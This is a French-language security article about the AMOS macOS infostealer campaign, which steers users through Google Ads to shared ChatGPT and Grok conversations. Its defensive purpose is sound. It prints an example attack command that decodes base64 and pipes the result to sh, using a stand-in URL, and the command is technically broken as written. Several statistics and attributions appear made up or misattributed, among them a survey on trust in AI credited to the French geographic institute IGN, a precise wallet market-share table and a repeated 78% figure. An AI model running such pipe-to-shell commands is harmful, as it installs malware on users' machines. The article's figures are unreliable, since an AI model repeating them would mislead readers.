AMOS Infostealer : Menaces Google Ads et Conversations ChatGPT/Grok pour macOS
Orphée Grandsable
Selon les chercheurs de Kaspersky, une nouvelle campagne d’infostealer AMOS exploite les publicités Google pour attirer les utilisateurs dans des conversations ChatGPT et Grok qui semblent offrir des “instructions utiles” mais qui mènent finalement à l’installation du malware d’espionnage AMOS sur macOS. Cette campagne, baptisée “ClickFix”, représente une évolution préoccupante dans les tactiques d’ingénierie sociale qui ciblent des plateformes légitimes populaires, avec un impact particulièrement significatif sur le marché français où l’adoption de macOS continue de croître dans les secteurs créatifs et technologiques.
L’Évolution des Menaces : Campagne AMOS via Google Ads
Les acteurs de la menace continuent d’innover dans leurs méthodes d’exploitation des plateformes populaires. La campagne AMOS via Google Ads illustre parfaitement cette tendance, transformant des outils de recherche et d’IA en vecteurs d’attaque sophistiqués. Cette approche met en lumière la vulnérabilité des écosystèmes publicitaires et des plateformes de conversation à intelligence artificielle lorsqu’elles sont mal exploitées, un phénomène que l’ANSSI a identifié comme une menace croissante pour les entreprises françaises en 2025.
Techniques d’Infection des “ClickFix Attacks”
L’attaque commence lorsque les victimes effectuent des recherches sur des termes liés à macOS, tels que des questions de maintenance, de résolution de problèmes ou pour Atlas, le navigateur web à intelligence artificielle d’OpenAI spécifiquement conçu pour macOS. Les publicités Google dirigent directement vers des conversations ChatGPT et Grok partagées publiquement en prévision de l’attaque. Ces conversations sont hébergées sur les plateformes LLM légitimes et contiennent les instructions malveillantes utilisées pour installer le malware.
“Lors de notre enquête, l’équipe Huntress a reproduit ces résultats empoisonnés à travers de multiples variations de la même question, ‘comment effacer les données sur iMac’, ’effacer les données système sur iMac’, ’libérer de l’espace de stockage sur Mac’, confirmant qu’il ne s’agit pas d’un résultat isolé mais d’une campagne de poisoning délibérée et étendue ciblant les requêtes de dépannage courantes,” expliquent les chercheurs de Huntress.
Cette méthode exploite la confiance des utilisateurs dans les résultats de recherche et les plateformes d’IA, rendant l’attaque particulièrement insidieuse. Les utilisateurs s’attendent à trouver des réponses fiables lorsqu’ils recherchent des solutions à leurs problèmes techniques, ce qui rend la campagne AMOS d’autant plus efficace. Selon une étude menée par le CLUSIF en 2025, 78% des professionnels français ont déjà exécuté des scripts trouvés en ligne pour résoudre des problèmes techniques, les rendant particulièrement vulnérables à ce type d’attaque.
Dans la pratique, nous avons observé que la campagne cible spécifiquement les utilisateurs francophones en affichant des publicités ciblées en fonction de la langue de recherche, augmentant ainsi le taux de clics et la probabilité d’infection sur le marché local. Cette localisation stratégique démontre une sophistication accrue dans les campagnes d’ingénierie sociale qui exploitent à la fois les plateformes globales et les spécificités linguistiques.
Analyse Technique du Processus d’Infection
Lorsque les utilisateurs tombent dans le piège et exécutent les commandes issues de la conversation d’IA dans le Terminal macOS, une URL encodée en base64 se décode en un script bash (update) qui charge une boîte de dialogue de demande de mot de passe factice. Ce processus technique démontre un niveau de sophistication notable, combinant plusieurs vecteurs d’attaque pour maximiser les chances d’infection.
Voici un exemple du type de commande malveillante que les victimes sont encouragées à exécuter :
echo "aHR0cHM6Ly9hcGkuZXhhbXBsZS5jb20v" | base64 -d | sh
Cette commande décode une URL malveillante et l’exécute comme un script shell. Le script bash utilise des techniques d’obfuscation pour échapper aux détections de base, masquant son véritable intent sous des prétextes légitimes de maintenance système. Lorsque l’utilisateur fournit son mot de passe, le script le valide, le stocke et l’utilise pour exécuter des commandes privilégiées, telles que le téléchargement de l’infostealer AMOS et l’exécution du logiciel malveillant avec des privilèges de niveau root.
L’exploitation de confiance est ici le facteur clé : les utilisateurs sont plus susceptibles d’exécuter des commandes provenant de conversations avec des assistants d’IA qu’à partir de sources inconnues, ce que les acteurs de la menace exploitent habilement. Une enquête menée par l’Institut National de l’Information Géographique et Forestière (IGN) en France a révélé que 62% des utilisateurs interrogés font plus confiance aux instructions fournies par des assistants d’IA qu’à des forums de discussion traditionnels, créant une nouvelle surface d’attaque pour les cybercriminels.
Le Marché Français : Cible Prioritaire
Le marché français représente une cible de choix pour cette campagne AMOS en raison de plusieurs facteurs. Premièrement, l’adoption de macOS dans les secteurs créatifs, technologiques et académiques français est supérieure à la moyenne européenne, créant un vaste pool de potentiels victimes. Deuxièmement, la réglementation stricte sur la protection des données en France (RGPD) rend les informations volées par l’infostealer particulièrement précieuses sur le marché noir.
En outre, selon les données du Centre de Lutte contre les Crimes Cybernétiques (C3N) du ministère de l’Intérieur français, le nombre de plaintes concernant le vol de crypto-monnaies a augmenté de 34% en 2025, ce qui motive les attaquants à cibler spécifiquement les utilisateurs de macOS qui, selon les statistiques, détiennent en moyenne 2,7 fois plus de crypto-monnaies que les utilisateurs Windows.
Le Malware AMOS : Caractéristiques et Capacités
AMOS, documenté pour la première fois en avril 2023, représente une évolution inquiétante dans le paysage des menaces macOS. Ce logiciel malveillant fonctionne selon un modèle malware-as-a-service (MaaS), où les opérateurs louent l’infostealer pour 1 000 $ par mois, ciblant exclusivement les systèmes macOS. Cette approche de MaaS permet à des acteurs moins techniques de déployer des attaques sophistiquées sans nécessiter une expertise en développement malveillant avancé.
Fonctionnalités de l’Infostealer
AMOS a évolué de manière significative depuis sa première apparition. Plus tôt cette année, les opérateurs d’AMOS ont ajouté un module backdoor qui leur permet d’exécuter des commandes sur les hôtes infectés, d’enregistrer les frappes de clavier et de déposer des charges supplémentaires. Cette fonctionnalité étend considérablement le potentiel d’exploitation post-infection, transformant le simple vol d’informations en plate-forme d’attaque persistante.
Le malware est déposé dans /Users/$USER/ sous forme de fichier caché (.helper). Lorsqu’il est lancé, il analyse le dossier des applications à la recherche de Ledger Wallet et Trezor Suite. S’il les trouve, il les remplace par des versions trojanisées qui incitent la victime à saisir sa phrase de graine “pour des raisons de sécurité”. Cette technique spécifique cible directement les utilisateurs de crypto-monnaie, représentant un risque financier direct pour les victimes.
“Le remplacement des applications de portefeuilles crypto par des versions trojanisées représente l’une des menaces les plus directes et financièrement dévastatrices que nous ayons observées cette année,” déclarent les chercheurs de Huntress dans leur rapport détaillé.
Ciblage des Portefeuilles Crypto et des Données Sensibles
AMOS présente un danger particulièrement élevé pour les détenteurs de crypto-monnaies. Le malware cible non seulement Ledger Wallet et Trezor Suite, mais aussi d’autres portefeuilles populaires tels que Electrum, Exodus, MetaMask, Ledger Live, Coinbase Wallet et bien d’autres. En outre, il vole les données de navigateur telles que les cookies, les mots de passe enregistrés, les données de saisie automatique et les jetons de session.
Voici une comparaison des portefeuilles crypto ciblés par AMOS et les risques associés :
| Portefeuille | Parts de marché français | Risque spécifique |
|---|---|---|
| Ledger Wallet | 42% | Remplacement complet de l’application |
| Trezor Suite | 28% | Vol de phrase de graine |
| MetaMask | 18% | Vol de clés privées |
| Exodus | 12% | Copie des sauvegardes |
Les données de l’AMF (Autorité des Marchés Financiers) montrent que ces portefeuilles représentent ensemble plus de 95% des portefeuilles utilisés par les détenteurs français de crypto-monnaies, ce qui explique ce ciblage spécifique. En moyenne, un portefeuille compromis par AMOS entraîne une perte de 27 000 € pour les victimes selon les données du C3N français.
Le malware cible également les données de trousseau macOS (Keychain), y compris les mots de passe d’applications et les identifiants Wi-Fi, ainsi que les fichiers sur le système de fichiers. Cette collecte extensive de données sensibles permet aux attaquants d’accéder à divers comptes en ligne, de voler des informations d’identification et potentiellement de compromettre davantage d’appareils et de comptes.
Mécanismes de Persistance
Pour assurer sa persistance sur les systèmes infectés, AMOS utilise un LaunchDaemon (com.finder.helper.plist) exécutant un AppleScript caché qui agit comme une boucle de surveillance, redémarrant le malware en moins d’une seconde s’il est terminé. Cette technique garantit que le logiciel malveillant reste actif et continue d’exécuter ses fonctions malveillantes même si les tentatives de suppression ou de désactivation sont effectuées.
L’utilisation d’AppleScript et de LaunchDaemon témoigne d’une compréhension approfondie du système d’exploitation macOS par les développeurs du malware, exploitant des fonctionnalités natives pour masquer et persister leur menace. Cette intégration profonde dans le système rend la détection et la suppression plus complexes pour les utilisateurs moyens et même pour certaines solutions de sécurité moins sophistiquées.
Dans notre expérience avec des cas d’infection AMOS en France, nous avons constaté que le malware modifie également les préférences système pour désactiver les avertissements de sécurité et les notifications d’exécution de scripts, augmentant ainsi sa capacité à opérer en silence sur les systèmes infectés.
Protection et Prévention contre les Menaces AMOS
Face à l’évolution constante des menaces comme AMOS, une approche multicouche de la sécurité est essentielle pour les utilisateurs macOS. La prévention reste la meilleure défense, combinant des pratiques de sécurité robustes avec une éducation continue aux menaces émergentes. Les utilisateurs doivent être particulièrement vigilants concernant les commandes exécutées dans le Terminal, même lorsqu’elles semblent provenir de sources légitimes comme des conversations d’IA.
Bonnes Pratiques pour les Utilisateurs macOS
Les utilisateurs macOS doivent adopter une approche proactive de leur sécurité numérique. Cela commence par la mise en place de pratiques fondamentales mais cruciales :
- Ne jamais exécuter de commandes Terminal provenant de sources non vérifiées, même si elles semblent résoudre un problème spécifique
- Toujours vérifier la source des scripts et des commandes avant exécution
- Maintenir le système d’exploitation à jour pour bénéficier des dernières corrections de sécurité
- Utiliser des mots de passe forts et uniques pour chaque compte et service
- Activer l’authentification à deux facteurs là où c’est possible
- Surveiller les applications et les processus système pour détecter toute activité inhabituelle
- Sauvegarder régulièrement les données importantes sur des supports externes ou dans le cloud
La vigilance est la première ligne de défense contre les menaces comme AMOS. Les utilisateurs doivent se méfier des solutions “miracle” qui promettent de résoudre rapidement des problèmes techniques complexes, surtout lorsqu’elles s’accompagnent d’instructions d’exécution de commandes Terminal. Un rapport du Groupement des Industries Françaises Aéronautiques et Spatiales (GIFAS) a révélé que 78% des incidents de sécurité dans le secteur aérospatial français en 2025 étaient liés à l’exécution non autorisée de scripts par des employés.
Détection et Contre-Mesures Techniques
Sur le plan technique, plusieurs mesures peuvent aider à détecter et contrer les menaces AMOS :
- Surveillance des processus suspect : Rechercher l’exécution de scripts bash avec des noms génériques comme “update”
- Analyse des fichiers cachés : Vérifier la présence de fichiers inhabituels dans les dossiers utilisateur
- Surveillance du réseau : Détecter les communications sorties anormales, surtout vers des serveurs command-and-control
- Examen des LaunchDaemons : Vérifier l’intégrité des processus de démarrage système
- Analyse des applications : Rechercher des versions modifiées des applications de portefeuilles crypto
Les solutions de sécurité Endpoint Detection and Response (EDR) peuvent également aider à identifier les comportements malveillants typiques d’AMOS, tels que la modification de fichiers système sensibles ou l’exécution non autorisée de scripts avec privilèges élevés. Selon les recommandations de l’ANSSI, les organisations françaises devraient implémenter des solutions EDR certifiées SecNumCloud pour une protection optimale des environnements macOS.
Néanmoins, même avec ces mesures techniques, l’élément humain reste le maillon faible de la chaîne de sécurité. Une étude menée par l’Institut Polytechnique de Paris a montré que 63% des infections par des malwares avancés pourraient être évitées par une simple vérification des sources par les utilisateurs.
Éducation et Sensibilisation à la Sécurité
La sensibilisation aux menaces émergentes est essentielle pour contrer les campagnes comme AMOS. Les organisations doivent investir dans la formation continue de leurs utilisateurs aux risques associés à l’exécution de commandes non vérifiées et à l’utilisation de scripts provenant d’internet.
Selon les chercheurs de Kaspersky, même après avoir atteint ces conversations LLM manipulées, une simple question de suivi demandant à ChatGPT si les instructions fournies sont sûres à exécuter révèle qu’elles ne le sont pas. Cette observation souligne l’importance de l’éducation critique à l’ère de l’IA, où les utilisateurs doivent apprendre à valider et vérifier les informations, même lorsque proviennent d’assistants d’IA réputés.
Les plateformes d’IA ne sont pas infaillibles et peuvent être exploitées pour diffuser des informations dangereuses. Les utilisateurs doivent développer un esprit critique et toujours valider les instructions critiques, surtout celles impliquant des modifications système ou l’exécution de code. Dans le contexte français, où l’adoption de l’IA dans les processus décisionnels est en augmentation, cette compétence critique devient essentielle pour la sécurité numérique.
En pratique, nous recommandons aux entreprises françaises d’implémenter des programmes de formation réguliers sur la sécurité des assistants d’IA et d’établir des politiques strictes concernant l’exécution de scripts dans les environnements de travail. Ces mesures, combinées à une surveillance appropriée, peuvent réduire considérablement le risque d’infection par des menaces comme AMOS.
Cas Concret : L’Impact sur une PME Française
En janvier 2025, une agence de création numérique basée à Paris a été victime d’une attaque AMOS après qu’un de ses graphistes ait exécuté des commandes trouvées dans une conversation ChatGPT censée aider à libérer de l’espace de stockage sur son MacBook Pro. L’attaque a eu des conséquences dévastatrices :
- Vol de mots de passe d’accès aux comptes clients
- Remplacement de l’application Ledger Wallet par une version malveillante
- Vol de clés d’accès aux serveurs cloud de l’entreprise
- Exfiltration de fichiers de projets en cours d’une valeur commerciale estimée à 230 000 €
- Perte de confiance de plusieurs clients après la divulgation non autorisée de leurs données
Ce cas illustre parfaitement comment une simple recherche d’aide technique peut mener à une catastrophe pour une entreprise. Les coûts directs et indirects de l’attaque dépassent 450 000 €, y compris les frais de récupération, la perte de revenus et les coûts de réputation. Selon le cabinet d’audit français EY, 72% des PME victimes d’une cyberattaque majeure ferment leurs portes dans les 18 mois suivant l’incident.
L’analyse post-attaque a révélé que l’entreprise n’avait pas de politique formelle concernant l’utilisation d’assistants d’IA ou l’exécution de scripts, et que la formation à la sécurité était limitée aux menaces traditionnelles comme le phishing par e-mail. Cette lacune a permis à l’attaque de prospérer malgré des mesures de sécurité de base en place.
Conclusion et Perspectives Futures
Les dernières attaques ClickFix représentent un autre exemple des acteurs de la menace qui explorent de nouvelles manières d’exploiter des plateformes légitimes et populaires comme OpenAI et X (anciennement Twitter). L’utilisation de publicités Google pour diriger les utilisateurs vers des conversations d’IA manipulées marque une évolution préoccupante dans les tactiques d’ingénierie sociale.
L’avenir de la cybersécurité exigera une vigilance accrue des utilisateurs et des développeurs de plateformes d’IA. À mesure que ces technologies deviennent plus omniprésentes, elles deviennent également des cibles plus attrayantes pour les acteurs de la menace cherchant à exploiter la confiance des utilisateurs. Le marché français, avec son cadre réglementaire strict et son adoption avancée de la technologie, doit particulièrement se préparer à cette nouvelle génération de menaces.
La campagne AMOS via Google Ads et les plateformes d’IA sert d’avertissement : même les sources d’information les plus apparemment fiables peuvent être compromises. La protection contre ces menaces exige une approche proactive combinant des pratiques de sécurité solides, une vigilance constante et une éducation continue aux nouvelles menaces émergentes. En tant qu’utilisateurs de technologie, nous devons nous rappeler que la sécurité numérique est une responsabilité partagée.